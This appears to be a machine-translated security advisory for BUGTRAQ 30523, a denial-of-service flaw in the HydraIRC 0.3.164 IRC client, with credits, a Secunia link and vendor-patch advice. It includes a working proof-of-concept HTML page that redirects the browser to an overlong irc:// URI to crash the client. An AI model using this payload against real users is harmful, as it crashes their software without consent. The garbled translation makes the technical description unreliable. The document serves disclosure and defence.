Issues the date: 2008-08-03
Renewal date: 2008-08-06

Is affected the system:
HydraIRC HydraIRC 0.3.164
Description:
--------------------------------------------------------------------------------
BUGTRAQ ID: 30523

HydraIRC is section of Yi Yong opens the source IRC client side.

HydraIRC processes the abnormal form when URI has the crack, if the user were deceived uses HydraIRC to open Web in browser's ultra length irc://“URI, might trigger the spatial indicator quotation, caused the client side collapse.

<* origin: securfrog (securfrog@gmail.com)
 
  Link: http://secunia.com/advisories/31376/
*>

Test method:
--------------------------------------------------------------------------------

Warning

The following procedure (method) possibly has the aggressivity, only supplies the safe research and teaching. The user risk is proud!

<html>
<head> <title>HydraIRC Remote Denial Of Service Poc </title></head>
<body>
<script>
var site = 'irc://127.0.0.1/'
var buf = 'A';
     while (buf.length <= 560) buf = buf + 'A';
document.location.href=site +buf
</script>
</body>
</html>

Suggested:
--------------------------------------------------------------------------------
Manufacturer patch:

HydraIRC
--------
At present the manufacturer has not provided the patch or the promotion procedure, we suggested that uses this software's user momentarily to pay attention to the manufacturer the main page to gain the newest edition:

http://www.hydrairc.com/